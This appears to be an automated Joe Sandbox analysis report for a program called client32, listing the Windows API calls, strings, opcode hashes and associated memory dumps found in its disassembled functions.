                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 819365019-2830328467
                                                                                                                                                                                                    • Opcode ID: a478cc059458106cf5704ce56e7de4ccd4a723f7f74860f299d0b8ca43b93d71
                                                                                                                                                                                                    • Instruction ID: 2149dfb7d7fad2f484445a2ad992c90f1569e5591f5ea3f8663e4569b2fc6047
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a478cc059458106cf5704ce56e7de4ccd4a723f7f74860f299d0b8ca43b93d71
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6EE086B5A00359BFD710DE45DCC5FD7B3ACEF54765F008429F95987240D6B0E99087A1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • PostMessageA.USER32(?,?,?,?), ref: 11001103
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • m_hWnd, xrefs: 110010E6
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$ErrorExitLastPostProcesswsprintf
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 906220102-2830328467
                                                                                                                                                                                                    • Opcode ID: 6e48cc0f22709dd1f677f00fe8a235e90bb64895bbfe6d3762ec5bb3e875e095
                                                                                                                                                                                                    • Instruction ID: 526bb494f44a88d6c72e7bb0fbd3121225ec46d2648d8932a1e0f472dc4001e3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e48cc0f22709dd1f677f00fe8a235e90bb64895bbfe6d3762ec5bb3e875e095
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F9E086B5A0021DBFD710DE45DC85FD7B3ACEB48764F008429FA1487600DAB0F950C7A0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000001), ref: 1101D09F
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • m_hWnd, xrefs: 1101D086
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1101D081
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorExitLastMessagePointsProcessWindowwsprintf
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 2663631564-2830328467
                                                                                                                                                                                                    • Opcode ID: fa98f24b7545a8703a321d683b87b1dea4d1bd6490adb13a2f25d9d98fe671f0
                                                                                                                                                                                                    • Instruction ID: 9c4b2b82cd9adc94e853c670648ed6e4092ddceab183af3ebe85ec827fccdc52
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fa98f24b7545a8703a321d683b87b1dea4d1bd6490adb13a2f25d9d98fe671f0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8FE0C2B1640319BBD210DA41EC86FE6B39C8B10765F008039F61856580D9B0A98087A1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,WTSGetActiveConsoleSessionId), ref: 11035741
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11035757
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • WTSGetActiveConsoleSessionId, xrefs: 1103573B
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                                                                    • String ID: WTSGetActiveConsoleSessionId
                                                                                                                                                                                                    • API String ID: 199729137-985505475
                                                                                                                                                                                                    • Opcode ID: 5aeb613780d4317b6c4fe32fb8bb10cba1a23ef9b8a27ed88a1ac7ef06f6d1ab
                                                                                                                                                                                                    • Instruction ID: dfe2ba98866f40b925ff5ae74b5290a810f1b4d05858a75e8431e5ab4ea7c49c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5aeb613780d4317b6c4fe32fb8bb10cba1a23ef9b8a27ed88a1ac7ef06f6d1ab
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74E0C231D12A308FC7219F6CF848789B7E4EF45B32F014A5AEAB593284C731A8818B91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ShowWindow.USER32(?,?), ref: 1100113B
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • m_hWnd, xrefs: 11001126
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001121
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorExitLastMessageProcessShowWindowwsprintf
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 1604732272-2830328467
                                                                                                                                                                                                    • Opcode ID: b3706d9d212bc44fc63b143c127adaed75df49cf66e2e4508a4744c3dc3a7521
                                                                                                                                                                                                    • Instruction ID: 23928ab379678a07e0f3a28c7a56dac56e7f9ec3f6936ec539a74ac81f8319a0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b3706d9d212bc44fc63b143c127adaed75df49cf66e2e4508a4744c3dc3a7521
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4FD02BB5A1032DABC314CA41DC81FD2F3AC9B103A4F004039F62442100D571E540C394
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • KillTimer.USER32(?,?), ref: 1100102B
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • m_hWnd, xrefs: 11001016
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001011
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorExitKillLastMessageProcessTimerwsprintf
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 2229609774-2830328467
                                                                                                                                                                                                    • Opcode ID: c668625be9c396e8122871d0668cda4b42639a8560f619d3b9b323c4263c3f1c
                                                                                                                                                                                                    • Instruction ID: ee2bff440c1eeb311b517f53df1393b18d0186c38d15746519086ed5f67e1e1e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c668625be9c396e8122871d0668cda4b42639a8560f619d3b9b323c4263c3f1c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50D02BB260032DABC310D641DC80FD2B3DCDB04364F008039FA5442140D670E4808390
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetVersion.KERNEL32(1100D73E,?), ref: 1100D4C9
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(AudioCapture.dll), ref: 1100D4D8
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LibraryLoadVersion
                                                                                                                                                                                                    • String ID: AudioCapture.dll
                                                                                                                                                                                                    • API String ID: 3209957514-2642820777
                                                                                                                                                                                                    • Opcode ID: 31160a4b39b369407e5d036c5ac5907d5ccb4198c4cf7eae390eb598ea28f55a
                                                                                                                                                                                                    • Instruction ID: de40c63e4a8a4fcde3dee2054331c33ed72f965d5ee4918db061c4a53d5809d0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 31160a4b39b369407e5d036c5ac5907d5ccb4198c4cf7eae390eb598ea28f55a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6AE01774E001638BF3029FB5884838E76D0A740699FC280B0ED22C0548FF6894808B31
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • KillTimer.USER32(?,00000001,?,11049246), ref: 11131446
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • m_hWnd, xrefs: 11131433
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1113142E
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorExitKillLastMessageProcessTimerwsprintf
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 2229609774-2830328467
                                                                                                                                                                                                    • Opcode ID: 205b0686d5236623331a90bfebdaad10eac3ab33d7e388880e187d4356a02918
                                                                                                                                                                                                    • Instruction ID: cbf25270b3b0651c58eed5869a3c9c02c4a96de395069bf87a5b764b24bbb751
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 205b0686d5236623331a90bfebdaad10eac3ab33d7e388880e187d4356a02918
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1AD0A775A503659FD7209626EC85FC1B2E81F04718F048428F55567584D7B4E4C08755
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FindWindowA.USER32(MSOfficeWClass,00000000), ref: 1110F3EA
                                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000414,00000000,00000000), ref: 1110F400
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
